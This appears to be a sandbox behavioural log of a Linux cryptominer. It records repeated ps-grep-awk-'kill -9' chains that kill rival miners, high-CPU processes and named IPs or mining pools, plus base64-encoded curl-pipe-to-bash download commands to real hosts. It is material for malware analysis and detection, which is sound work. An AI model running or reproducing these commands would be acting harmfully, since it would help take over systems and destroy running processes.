- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2096
- /bin/grep
  grep -v grep
  2⤵
  PID:2095
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2094
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2102
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2101
- /bin/grep
  grep -v grep
  2⤵
  PID:2100
- /bin/ps
  ps aux
  2⤵
  PID:2099
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2107
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2106
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2105
- /bin/grep
  grep -v grep
  2⤵
  PID:2104
- /bin/ps
  ps aux
  2⤵
  PID:2103
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2112
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2111
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2110
- /bin/grep
  grep -v grep
  2⤵
  PID:2109
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2108
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2117
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2116
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2115
- /bin/grep
  grep -v grep
  2⤵
  PID:2114
- /bin/ps
  ps aux
  2⤵
  PID:2113
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2122
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2121
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2120
- /bin/grep
  grep -v grep
  2⤵
  PID:2119
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2127
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2126
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2125
- /bin/grep
  grep -v grep
  2⤵
  PID:2124
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2123
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2132
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2131
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2130
- /bin/grep
  grep -v grep
  2⤵
  PID:2129
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2128
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2138
- - /usr/local/sbin/kill
    kill -9 1499
    3⤵
    PID:2139
- - /usr/local/bin/kill
    kill -9 1499
    3⤵
    PID:2139
- - /usr/sbin/kill
    kill -9 1499
    3⤵
    PID:2139
- - /usr/bin/kill
    kill -9 1499
    3⤵
    PID:2139
- - /sbin/kill
    kill -9 1499
    3⤵
    PID:2139
- - /bin/kill
    kill -9 1499
    3⤵
    PID:2139
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2137
- /bin/grep
  grep "]"
  2⤵
  PID:2136
- /bin/grep
  grep -v aux
  2⤵
  PID:2135
- /bin/grep
  grep -v grep
  2⤵
  PID:2134
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2133
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2144
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2143
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2142
- /bin/grep
  grep -v grep
  2⤵
  PID:2141
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2140
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2149
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2148
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2147
- /bin/grep
  grep -v grep
  2⤵
  PID:2146
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2145
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2154
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2153
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2152
- /bin/grep
  grep -v grep
  2⤵
  PID:2151
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2150
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2161
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2160
- /bin/grep
  grep -v _
  2⤵
  PID:2159
- /bin/grep
  grep -v -
  2⤵
  PID:2158
- /bin/grep
  grep -v /
  2⤵
  PID:2157
- /bin/grep
  grep -v grep
  2⤵
  PID:2156
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2155
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2166
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2165
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2164
- /bin/grep
  grep -v grep
  2⤵
  PID:2163
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2162
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2171
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2170
- /bin/grep
  grep rsync
  2⤵
  PID:2169
- /bin/grep
  grep -v grep
  2⤵
  PID:2168
- /bin/ps
  ps aux
  2⤵
  PID:2167
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2176
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2175
- /bin/grep
  grep watchd0g
  2⤵
  PID:2174
- /bin/grep
  grep -v grep
  2⤵
  PID:2173
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2172
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2181
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2180
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2179
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2179
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2179
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2179
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2179
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2179
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2179
- /bin/grep
  grep -v grep
  2⤵
  PID:2178
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2177
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2186
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2185
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:2184
- /bin/grep
  grep -v grep
  2⤵
  PID:2183
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2182
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2191
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2190
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2189
- /bin/grep
  grep -v grep
  2⤵
  PID:2188
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2187
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2196
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2195
- /bin/grep
  grep gitee.com
  2⤵
  PID:2194
- /bin/grep
  grep -v grep
  2⤵
  PID:2193
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2192
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2201
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2200
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2199
- /bin/grep
  grep -v grep
  2⤵
  PID:2198
- /bin/ps
  ps aux
  2⤵
  PID:2197
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2206
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2205
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2204
- /bin/grep
  grep -v grep
  2⤵
  PID:2203
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2202
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2211
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2210
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2209
- /bin/grep
  grep -v grep
  2⤵
  PID:2208
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2207
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2216
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2215
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2214
- /bin/grep
  grep -v grep
  2⤵
  PID:2213
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2212
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2221
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2220
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2219
- /bin/grep
  grep -v grep
  2⤵
  PID:2218
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2217
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2226
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2225
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2224
- /bin/grep
  grep -v grep
  2⤵
  PID:2223
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2222
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2231
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2230
- /bin/grep
  grep netdns
  2⤵
  PID:2229
- /bin/grep
  grep -v grep
  2⤵
  PID:2228
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2227
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2236
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2235
- /bin/grep
  grep watchdogs
  2⤵
  PID:2234
- /bin/grep
  grep -v grep
  2⤵
  PID:2233
- /bin/ps
  ps aux
  2⤵
  PID:2232
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2248
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:2247
- /bin/grep
  grep -v postgresq1
  2⤵
  PID:2246
- /bin/grep
  grep -v kdevtmpfsi
  2⤵
  PID:2245
- /bin/grep
  grep -v atd
  2⤵
  PID:2244
- /bin/grep
  grep -v apache2
  2⤵
  PID:2243
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:2242
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:2241
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:2240
- /bin/grep
  grep -v root
  2⤵
  PID:2239
- /bin/grep
  grep -v grep
  2⤵
  PID:2238
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2237
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2254
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2253
- /bin/grep
  grep " ps"
  2⤵
  PID:2252
- /bin/grep
  grep -v aux
  2⤵
  PID:2251
- /bin/grep
  grep -v grep
  2⤵
  PID:2250
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2249
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2259
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2258
- /bin/grep
  grep sync_supers
  2⤵
  PID:2257
- /bin/grep
  grep -v grep
  2⤵
  PID:2256
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2255
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2264
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2263
- /bin/grep
  grep cpuset
  2⤵
  PID:2262
- /bin/grep
  grep -v grep
  2⤵
  PID:2261
- /bin/ps
  ps aux
  2⤵
  PID:2260
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2270
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2269
- /bin/grep
  grep "x]"
  2⤵
  PID:2268
- /bin/grep
  grep -v aux
  2⤵
  PID:2267
- /bin/grep
  grep -v grep
  2⤵
  PID:2266
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2265
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2276
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2275
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2274
- /bin/grep
  grep -v aux
  2⤵
  PID:2273
- /bin/grep
  grep -v grep
  2⤵
  PID:2272
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2271
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2282
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2281
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2280
- /bin/grep
  grep -v aux
  2⤵
  PID:2279
- /bin/grep
  grep -v grep
  2⤵
  PID:2278
- /bin/ps
  ps aux
  2⤵
  PID:2277
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2287
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2286
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2285
- /bin/grep
  grep -v grep
  2⤵
  PID:2284
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2283
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2292
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2291
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2290
- /bin/grep
  grep -v grep
  2⤵
  PID:2289
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2297
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2296
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2295
- /bin/grep
  grep -v grep
  2⤵
  PID:2294
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2293
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2302
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2301
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2300
- /bin/grep
  grep -v grep
  2⤵
  PID:2299
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2298
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2307
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2306
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2305
- /bin/grep
  grep -v grep
  2⤵
  PID:2304
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2303
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2312
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2311
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2310
- /bin/grep
  grep -v grep
  2⤵
  PID:2309
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2308
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2316
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2315
- /bin/grep
  grep -v grep
  2⤵
  PID:2314
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2313
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2322
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2321
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2320
- /bin/grep
  grep -v grep
  2⤵
  PID:2319
- /bin/ps
  ps aux
  2⤵
  PID:2318
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2327
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2326
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2325
- /bin/grep
  grep -v grep
  2⤵
  PID:2324
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2323
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2332
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2331
- /bin/grep
  grep sustse
  2⤵
  PID:2330
- /bin/grep
  grep -v grep
  2⤵
  PID:2329
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2328
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2337
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2336
- /bin/grep
  grep sustse3
  2⤵
  PID:2335
- /bin/grep
  grep -v grep
  2⤵
  PID:2334
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2333
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2343
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2342
- /bin/grep
  grep wget
  2⤵
  PID:2341
- /bin/grep
  grep mr.sh
  2⤵
  PID:2340
- /bin/grep
  grep -v grep
  2⤵
  PID:2339
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2338
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2349
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2348
- /bin/grep
  grep curl
  2⤵
  PID:2347
- /bin/grep
  grep mr.sh
  2⤵
  PID:2346
- /bin/grep
  grep -v grep
  2⤵
  PID:2345
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2344
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2355
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2354
- /bin/grep
  grep wget
  2⤵
  PID:2353
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2352
- /bin/grep
  grep -v grep
  2⤵
  PID:2351
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2350
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2361
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2360
- /bin/grep
  grep curl
  2⤵
  PID:2359
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2358
- /bin/grep
  grep -v grep
  2⤵
  PID:2357
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2356
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2367
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2366
- /bin/grep
  grep wget
  2⤵
  PID:2365
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2364
- /bin/grep
  grep -v grep
  2⤵
  PID:2363
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2362
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2373
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2372
- /bin/grep
  grep curl
  2⤵
  PID:2371
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2370
- /bin/grep
  grep -v grep
  2⤵
  PID:2369
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2368
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2379
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2378
- /bin/grep
  grep wget
  2⤵
  PID:2377
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2376
- /bin/grep
  grep -v grep
  2⤵
  PID:2375
- /bin/ps
  ps aux
  2⤵
  PID:2374
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2385
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2384
- /bin/grep
  grep curl
  2⤵
  PID:2383
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2382
- /bin/grep
  grep -v grep
  2⤵
  PID:2381
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2380
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2390
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2389
- /bin/grep
  grep j2.conf
  2⤵
  PID:2388
- /bin/grep
  grep -v grep
  2⤵
  PID:2387
- /bin/ps
  ps aux
  2⤵
  PID:2386
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2396
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2395
- /bin/grep
  grep wget
  2⤵
  PID:2394
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2393
- /bin/grep
  grep -v grep
  2⤵
  PID:2392
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2391
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2402
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2401
- /bin/grep
  grep curl
  2⤵
  PID:2400
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2399
- /bin/grep
  grep -v grep
  2⤵
  PID:2398
- /bin/ps
  ps aux
  2⤵
  PID:2397
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2408
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2407
- /bin/grep
  grep wget
  2⤵
  PID:2406
- /bin/grep
  grep ficov
  2⤵
  PID:2405
- /bin/grep
  grep -v grep
  2⤵
  PID:2404
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2403
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2414
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2413
- /bin/grep
  grep curl
  2⤵
  PID:2412
- /bin/grep
  grep ficov
  2⤵
  PID:2411
- /bin/grep
  grep -v grep
  2⤵
  PID:2410
- /bin/ps
  ps aux
  2⤵
  PID:2409
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2420
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2419
- /bin/grep
  grep wget
  2⤵
  PID:2418
- /bin/grep
  grep he.sh
  2⤵
  PID:2417
- /bin/grep
  grep -v grep
  2⤵
  PID:2416
- /bin/ps
  ps aux
  2⤵
  PID:2415
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2426
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2425
- /bin/grep
  grep curl
  2⤵
  PID:2424
- /bin/grep
  grep he.sh
  2⤵
  PID:2423
- /bin/grep
  grep -v grep
  2⤵
  PID:2422
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2421
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2432
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2431
- /bin/grep
  grep wget
  2⤵
  PID:2430
- /bin/grep
  grep miner.sh
  2⤵
  PID:2429
- /bin/grep
  grep -v grep
  2⤵
  PID:2428
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2427
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2438
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2437
- /bin/grep
  grep curl
  2⤵
  PID:2436
- /bin/grep
  grep miner.sh
  2⤵
  PID:2435
- /bin/grep
  grep -v grep
  2⤵
  PID:2434
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2433
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2444
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2443
- /bin/grep
  grep wget
  2⤵
  PID:2442
- /bin/grep
  grep nullcrew
  2⤵
  PID:2441
- /bin/grep
  grep -v grep
  2⤵
  PID:2440
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2439
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2450
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2449
- /bin/grep
  grep curl
  2⤵
  PID:2448
- /bin/grep
  grep nullcrew
  2⤵
  PID:2447
- /bin/grep
  grep -v grep
  2⤵
  PID:2446
- /bin/ps
  ps aux
  2⤵
  PID:2445
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2455
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2454
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2453
- /bin/grep
  grep -v grep
  2⤵
  PID:2452
- /bin/ps
  ps aux
  2⤵
  PID:2451
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2460
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2459
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2458
- /bin/grep
  grep -v grep
  2⤵
  PID:2457
- /bin/ps
  ps aux
  2⤵
  PID:2456
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2465
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2464
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2463
- /bin/grep
  grep -v grep
  2⤵
  PID:2462
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2461
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2470
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2469
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2468
- /bin/grep
  grep -v grep
  2⤵
  PID:2467
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2466
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2475
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2474
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2473
- /bin/grep
  grep -v grep
  2⤵
  PID:2472
- /bin/ps
  ps aux
  2⤵
  PID:2471
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2480
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2479
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2478
- /bin/grep
  grep -v grep
  2⤵
  PID:2477
- /bin/ps
  ps aux
  2⤵
  PID:2476
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2485
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2484
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2483
- /bin/grep
  grep -v grep
  2⤵
  PID:2482
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2481
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2490
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2489
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2488
- /bin/grep
  grep -v grep
  2⤵
  PID:2487
- /bin/ps
  ps auxf
  2⤵
  PID:2486
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2495
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2494
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:2493
- /bin/grep
  grep -v grep
  2⤵
  PID:2492
- /bin/ps
  ps auxf
  2⤵
  PID:2491
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2500
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2499
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2498
- /bin/grep
  grep -v grep
  2⤵
  PID:2497
- /bin/ps
